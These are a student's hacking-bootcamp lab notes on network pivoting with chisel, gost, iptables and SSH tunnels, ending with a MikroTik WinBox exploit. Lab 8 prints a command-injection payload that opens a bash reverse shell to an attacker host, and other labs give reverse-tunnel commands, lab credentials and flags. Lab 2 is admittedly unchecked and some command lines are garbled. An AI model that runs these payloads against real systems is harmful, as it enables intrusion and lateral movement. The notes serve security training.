This document outlines the labs completed on 08/04/2025 during the hacking bootcamp, focusing on network pivoting and lateral movement techniques in Windows and Linux environments.
- Lab 1: Pivoting Windows Example
- Lab 2: Pivoting Windows Task
- Lab 3: Pivoting using built-in Linux capabilities Task
- Lab 4: Pivoting Gost Task
- Lab 5: Pivoting Chisel Task
- Lab 6: Pivoting SSH Task
- Lab 7: Pivoting Chisel Example
- Lab 8: Pivoting Network Pivoting
- Lab 9: Going Beyond DMZ
Establish a pivot through a compromised Windows machine to access an internal network.
- Exposed Services: Open ports (e.g., RDP) on a compromised Windows host allow pivoting.
Compromised Windows machine must be accessible with valid credentials.
- Setup
- Verify connectivity to the compromised Windows host.
ping <WINDOWS_IP>
- Reconnaissance
- Scan for internal network hosts from the compromised machine.
netscan.exe -r <INTERNAL_SUBNET>
- Exploitation
- Download chisel client for windows and linux
# Download and clean-up the Linux version of Chisel v1.9.1 wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz gunzip chisel_1.9.1_linux_amd64.gz mv chisel_1.9.1_linux_amd64 chisel # Download and clean-up the Windows version of Chisel v1.9.1 wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz gunzip chisel_1.9.1_windows_amd64.gz mv chisel_1.9.1_windows_amd64 chisel.exe
- Start a listener on the attcking machine:
./chisel server --port 5000 --reverse
- Copy the exe version to victim computern(copy, shared folder, python server..) and execute it:
.\chisel.exe client <ATTACKER_IP>:5000 R:8888:127.0.0.1:8000
- Get the flag in your attacking machine from the internal network .
curl localhost:8888
Compromised Windows hosts with network access allow attackers to pivot by routing traffic through them with chisel.
- Use netsh for port forwarding on Windows.
- TO-DO.
Pivot through a Windows machine using RDP and chisel to access an internal SQL Server and retrieve a flag from its database. BEWARE: While writing the walkthrough for this lab, the vm was unavailable so I did not proof-check the steps. I will delete this notice when i will do the proof-checking, but it should work :)
- Open RDP Service: RDP access on the Windows host (
<TARGET_IP>) allows execution of tools likechisel. - Weak SQL Credentials: Reusable
sacredentials enable access to the internal SQL Server.
- RDP access to the Windows host with credentials
user:ohX8haer8aexoo7d. - MSSQL credentials
sa:euteiGhaetah2ohyfor the SQL Server (10.152.152.11:1433). chiselbinary for port forwarding andimpacket-mssqlclientfor database access.
-
Setup
- Verify RDP access to the Windows host:
xfreerdp /u:user /p:ohX8haer8aexoo7d /v:10.10.0.48 +clipboard /dynamic-resolution
- Download
chiselfor Windows:wget https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_windows_amd64.gz gunzip chisel_1.10.0_windows_amd64.gz mv chisel_1.10.0_windows_amd64 chisel.exe
- Transfer
chisel.exeto the Windows host via RDP (e.g., clipboard or shared drive or python http server). Check Lab 1 for reference.
- Verify RDP access to the Windows host:
-
Reconnaissance
- Confirm network access to the internal SQL Server (
10.152.152.11:1433) from the Windows host. In a Windows command prompt:(Iftelnet 10.152.152.11 1433
telnetis unavailable, assume connectivity based on task context.)
- Confirm network access to the internal SQL Server (
-
Exploitation
- Start a
chiselserver on your attacking machine:./chisel server -p 8000 --reverse
- On the Windows host, run
chiselclient to forward the SQL Server port:Replacechisel.exe client <ATTACKER_IP>:8000 R:1433:10.152.152.11:1433
<ATTACKER_IP>with your machine’s IP (e.g.,100.100.75.242). - Connect to the SQL Server via the forwarded port:
impacket-mssqlclient sa:euteiGhaetah2ohy@127.0.0.1 -port 1433
- Enumerate databases and tables to find the flag:
Example output:
SELECT name FROM sys.databases; USE <database_name>; SELECT table_name FROM information_schema.tables; SELECT * FROM <table_name>;
flag_column -------------------- cybered{...}
- Start a
RDP provides access to the Windows host, allowing execution of chisel to create a reverse tunnel. This tunnel forwards the internal SQL Server’s port (10.152.152.11:1433) to 127.0.0.1:1433 on your local machine, enabling impacket-mssqlclient to connect using the provided credentials. The sa account’s weak credentials allow full database access to retrieve the flag.
- Use SSH tunneling (if available) instead of
chisel:ssh -L 1433:10.152.152.11:1433 user@10.10.0.48
- Use
mssqlclient.pyfrom a different toolset ifimpacketfails.
- Chisel Documentation: https://github.com/jpillora/chisel
- Impacket MSSQL Client: https://github.com/SecureAuthCorp/impacket
- Ensure port 8000 is open on your local machine for the
chiselserver. - If the flag is not in a table, check views or stored procedures:
SELECT name FROM sys.objects WHERE type IN ('V', 'P');
- Verify the SQL Server IP and port if connection fails.
Pivot through a Linux machine using built-in iptables to forward DNS traffic and access a TXT record from an internal DNS server.
- Open SSH Service: SSH access on the intermediate host (
10.10.0.48) withiptablesas the login shell enables configuration of port forwarding rules. - IP Forwarding Enabled: Allows routing of packets to the internal network.
- SSH access to the intermediate host (
10.10.0.48:2222) with credentialsroot:c3898f5ff5f5576be10a81aeadf55d74. - Ability to configure
iptablesrules to forward traffic to the internal DNS server (10.152.152.11:53).
- Setup
- Verify SSH access to the intermediate host:
ssh -p 2222 root@10.10.0.48 -- --helpThis confirms the iptables shell is active and accepts arguments.
- Reconnaissance
- Check existing
iptablesNAT rules to ensure no conflicting configurations:
ssh -p 2222 root@10.10.0.48 -- -t nat -L -v -nOutput shows no initial rules in the NAT table.
- Optionally, you may reset it
ssh -p 2222 root@10.10.0.48 -- -t nat -F
- Exploitation
- Configure
iptablesto forward DNS traffic (TCP and UDP) from port 10000 on the intermediate host to the internal DNS server (10.152.152.11:53):ssh -p 2222 root@10.10.0.48 -- -t nat -A POSTROUTING -p tcp -d 10.152.152.11 --dport 53 -j MASQUERADE ssh -p 2222 root@10.10.0.48 -- -t nat -A POSTROUTING -p udp -d 10.152.152.11 --dport 53 -j MASQUERADE
- Clear and set
INPUTchain rules to allow incoming traffic on port 10000:ssh -p 2222 root@10.10.0.48 -- -F INPUT ssh -p 2222 root@10.10.0.48 -- -A INPUT -p tcp --dport 10000 -j ACCEPT ssh -p 2222 root@10.10.0.48 -- -A INPUT -p udp --dport 10000 -j ACCEPT
- Add
PREROUTINGrules to forward traffic to the DNS server:ssh -p 2222 root@10.10.0.48 -- -t nat -A PREROUTING -p tcp --dport 10000 -j DNAT --to-destination 10.152.152.11:53 ssh -p 2222 root@10.10.0.48 -- -t nat -A PREROUTING -p udp --dport 10000 -j DNAT --to-destination 10.152.152.11:53
- Verify connectivity to port 10000:
Output:
nc -zv 10.10.0.48 10000
Connection to 10.10.0.48 10000 port [tcp/webmin] succeeded! - Query the TXT record for
flag.pivoting.localusingdig:Output:dig @10.10.0.48 -p 10000 flag.pivoting.local TXT +tcp
;; ANSWER SECTION: flag.pivoting.local. 3600 IN TXT "cybered{b34b945a267684a7f7e8236f2295d0b0}"
- Configure
- The
iptablesrules in thenattable (PREROUTINGandPOSTROUTING) redirect incoming DNS queries on port 10000 to the internal DNS server (10.152.152.11:53). TheMASQUERADErule ensures return traffic is routed correctly, leveraging the enabled IP forwarding. TheINPUTchain rules allow external access to port 10000 on the intermediate host.
- Use SSH dynamic port forwarding (if not blocked) to create a SOCKS proxy and route DNS queries through it.
- Example:
ssh -p 2222 root@10.10.0.48 -D 9050 dig @10.152.152.11 -p 53 flag.pivoting.local TXT +tcp -S socks5://127.0.0.1:9050
- iptables NAT Guide: https://www.netfilter.org/documentation/HOWTO/NAT-HOWTO.html
- DNS Query with dig: https://linux.die.net/man/1/dig
- Ensure port 10000 is not blocked by external firewalls. If connectivity fails, try another port in the range 10000–10010.
- The
+tcpflag indigensures TCP-based DNS queries, which may be more reliable in some network configurations. - The IP 10.10.0.48 corresponds to the <TARGET_IP> or intermediate host.
- Use GOST (a secure tunneling tool) on an intermediate host (10.152.152.10) to:
- Connect to an internal FTP server (10.152.152.11).
- Download flag.txt from an anonymous FTP service.
- Constraints:
- SSH proxy/tunneling is blocked (e.g., -D, -L/-R flags disabled).
- No arbitrary shell commands (restricted shell via iptables).
- Must use a wrapper to pass arguments through SSH:
ssh -p 2222 root@10.152.152.10 -- ARGS # ARGS = GOST command
- Exposed Services: Compromised host with network access allows Gost-based pivoting.
Compromised host must be accessible and Gost (latest version) installed.
-
Setup
- Verify connectivity to the pivot host.
ping <TARGET_IP>
- Download the latest version of gost preferably as a binary: https://github.com/ginuerzh/gost/releases
-
Reconnaissance
- Identify open port/services with nmap. Everything was disclosed in the task, so this is not necessary here. For scanning internal network hosts we could use chisel, probably gost too.
nmap -sP -sV <TARGET_IP>
- SSH port is found to be 2222 which is unconventional.
-
Exploitation
- Set up a Gost SOCKS5 proxy.
ssh -p <SSH_PORT> user@<TARGET_IP> -- -L ssh -p 2222 user@10.10.0.48"
- Start a relay server on your machine on any port in a new terminal:
./gost -L "relay://:1234?bind=true"- To check if the port you chose is accessible:
nc -zv <ATTACKER_IP> 1234 - Set up remote port forwarding. Establish in a new terminal the relay forwarding from the intermediate host to your local machine.
ssh -p <SSH_PORT> user@<TARGET_IP>-- -L "rtcp://127.0.0.1:1080/127.0.0.1:1080/" -F "relay+tcp://<ATTACKER_IP>:1234"
- Finally get the flag from the specified ftp server in the task:
curl --socks5 localhost:1080 ftp://10.152.152.11/flag.txt -o flag.txt
- Gost establishes a relay tunnel where your local machine binds a socks5 proxy on localhost:1080, tunneled back to the intermediate host's socks5 server (which can reach the internal FTP).
- Keep all sessions running during the curl.
- Use Chisel or ligolo or metasploit for similar SOCKS proxy pivoting.
- Gost is already downloaded an installed on the pivot host. If it wasn't, and an interactive shell was available via ssh, we should have downloaded the binary to the target machine ourselves.
- Use Chisel to pivot through a compromised host to access an internal network.
- Set up a Chisel tunnel through an intermediate SSH host.
- Listen on TCP port 1337 and ensure it serves an HTTP response with a flag every minute.
- Restrictions:
- The SSH host blocks proxy traffic (e.g., -D, -L/-R forwarding).
- No arbitrary shell commands allowed (restricted shell via iptables).
- Must use a wrapper to pass arguments via SSH (e.g., ssh -p 2222 root@IP -- ARGS).
- Network Access: Compromised host with open ports allows Chisel-based pivoting.
Compromised host must have Chisel installed and accessible.
- Setup
- Verify connectivity to host.
ping <TARGET_IP>
- Reconnaissance
- Scan the target host to discover on which port is the ssh server running (in port 2222 for our case).
nmap -sP <TARGET_IP>
- Exploitation
- Set up a Chisel server on your attacking machine.
chisel server -p 5000
- Start a netcat listener on the same port
nc -nlvp 1337 - On another terminal, setup the chisel client on the intermediate host via an SSH wrapper
ssh -p 2222 user@<TARGET_IP> -- client <ATTACKER_IP>:5000 0.0.0.0:1337:0.0.0.0:1337
- Curl the exposed site and get the flag from the netcat listener
curl 127.0.0.1:1337 - The tunnel worked because chisel was made available in
/opt/chiselin the intermediate (target) host already, and the system is configured to execute the commands in the ssh wrapper with it (chisel) by default. In the absence of the later, we could have tried:ssh -p 2222 user@<TARGET_IP> -- ./chisel client <ATTACKER_IP>:5000 0.0.0.0:1337:0.0.0.0:1337(specifying ./chisel from attacking machine.)
- Chisel’s reverse tunneling creates a SOCKS proxy, routing traffic through the compromised host to internal networks.
- Chisel bypasses SSH restrictions by using its own encrypted tunnel.
- Reverse mode (R:): The intermediate host connects to your server, avoiding inbound firewall blocks.
- Use SSH dynamic port forwarding for pivoting.
- Ensure Chisel binaries are available on both attacking machine.
Pivot through a compromised Linux host using SSH tunneling to access an internal network.
- SSH Access: Open SSH service on a compromised host enables tunneling.
Compromised Linux host must have SSH access enabled. Download and install naabu from apt, snap, or github.
- Setup
- Set up SSH local port forwarding and connect with ssh port forwarding your chosen port. In our case, I chose 9050.
ssh -D <FORWARDING_PORT> user@<TARGET_IP> -p 2222
- Reconnaissance
- In another terminal, identify internal network hosts which are up and their ports.
naabu -proxy 127.0.0.1:<FORWARDING_PORT> -port 80,8080,8000 -host 10.152.152.0/24
- Naabu will find an open port and host (10.152.152.93:8080).
- Exploitation
- Access the exposed internal website to get the flag.
curl --socks5 127.0.0.1:9050 http://10.152.152.93:8080
- SSH local port forwarding redirects traffic through the compromised host, accessing internal services. Naabu is nmap on steroids.
- Chisel bypasses SSH restrictions by using its own encrypted tunnel.
- Use SSH dynamic port forwarding for broader network access.
- SSH Tunneling Guide: https://www.ssh.com/academy/ssh/tunneling-example
- Naabu github: https://github.com/projectdiscovery/naabu
- Update /etc/ssh/sshd_config to allow TCP forwarding if disabled.
Demonstrate pivoting through a compromised host using Chisel to access an internal service. Lab is experimental, no solution required.
- Exposed Ports: Compromised host with network access allows Chisel tunneling.
Compromised host must have Chisel installed and accessible.
-
Setup
-
Reconnaissance
-
Exploitation
- Test connectivity to the internal service after establishing the tunnel.
- Chisel bypasses SSH restrictions by using its own encrypted tunnel.
- Reverse mode (R:): The intermediate host connects to your server, avoiding inbound firewall blocks.
Perform network pivoting to access multiple internal subnets via a compromised host.
- Network Access: Compromised host with multiple network interfaces enables pivoting.
Compromised host must have access to multiple internal subnets.
-
Setup
- Verify connectivity to the pivot host.
ping <PIVOT_IP>
-
Reconnaissance
- Check web interface accessible on port 1337 or 1338.
- Website's ping functionality allows for command injection.
-
Exploitation
- Start a netcat listener on your attacking machine
nc -nlvp <PORT>. - Ping this command on the web interface to get a reverse shell
; bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1' - Get the internal network IP
cat /etc/hosts/ - Scan the internal network subnet to find any hosts up. In our case, the internal network subnet was 172.18.0.* (172.18.0.2 was found in /etc/hosts)
for ip in {1..254}; do curl --connect-timeout 1 http://172.18.0.$ip &> /dev/null && echo "172.18.0.$ip is UP" & done
- Forward the identified internal network host with chisel (in our case, 172.18.0.3):
- Download chisel in your attacker machine, you can find it in resources/Tools.
chmod +x chisel ./chisel server -p 8989 --reverse
- Server chisel over a python http server
python3 -m http.server 8000and download it from the target machinecurl <ATTACKER-IP>:8000/chisel - Start a chisel client with port forwarding:
chmod +x chisel ./chisel client <ATTACKER-IP>:8989 R:8080:172.18.0.3:80
- The internal website becomes accessible from your attacking machine on
127.0.0.1:80 - Use this web directory wordlist and find the directory containing the flag.
gobuster dir -u http://127.0.0.1:80 -w wordlist.txt
- Start a netcat listener on your attacking machine
- Chisel bypasses SSH restrictions by using its own encrypted tunnel.
- Reverse mode (R:): The intermediate host connects to your server, avoiding inbound firewall blocks.
- Use SSH port forwarding, or proxychains/SOCKS proxies to expose the internal website. See step by step guide in classes/day 6.
- Chisel Documentation: https://github.com/jpillora/chisel
- Network Pivoting Guide: https://www.offensive-security.com/metasploit-unleashed/pivoting/
- TODO
Exploit Mikrotik router vulnerability to extract password from history of router accounts.
- Mikrotik critical WinBox vulnerability (CVE-2018-14847) which allows for arbitrary file read of plain text passwords
- Vm should be up and accessible.
-
Setup
- Verify connectivity to the DMZ host.
ping <TARGET_IP>
-
Reconnaissance
- Scan internal network from the DMZ host.
nmap -sV -O <INTERNAL_SUBNET>
- You will discover a MikroTik RouterOS device (version 6.40.7) with several exposed services including winbox on port 8291
-
Exploitation
- Clone the the exploit from github and exploit it to get the password.
git clone https://github.com/BigNerd95/WinboxExploit.git mikrotik cd mikrotik python3 WinboxExploit.py <TARGET_IP> 8291
- Use the obtained credentials to access the Mikrotik web interface with the user admin. The password is also the flag.
The DMZ host’s access to internal networks allows attackers to tunnel traffic through it, bypassing firewall restrictions.
- You could easily bruteforce the password with ffuf and a seclist password wordlist.
- Ensure the DMZ host allows reverse SSH connections.